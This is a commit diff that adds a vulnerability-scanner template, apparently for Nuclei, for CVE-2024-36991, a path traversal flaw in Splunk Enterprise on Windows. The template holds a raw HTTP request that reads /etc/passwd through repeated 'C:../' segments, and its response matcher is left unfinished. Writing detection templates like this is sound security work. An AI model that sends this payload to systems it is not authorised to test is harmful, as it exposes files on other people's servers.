Create CVE-2024-36991.yaml

http/cves/2024/CVE-2024-36991.yaml

@@ -0,0 +1,30 @@
+id: CVE-2024-36991
+
+info:
+  name: Splunk Enterprise - Local File Inclusion
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.
+  reference:
+    - https://x.com/sheikhrishad0/status/1809210005125746880/photo/1
+  metadata:
+    fofa-query: "Splunk Enterprise"
+  tags: cve,cve2024,splunk,lfi
+
+http:
+  - raw:
+    - |
+        GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+#to be added          - ""
+
+      - type: status
+        status:
+          - 200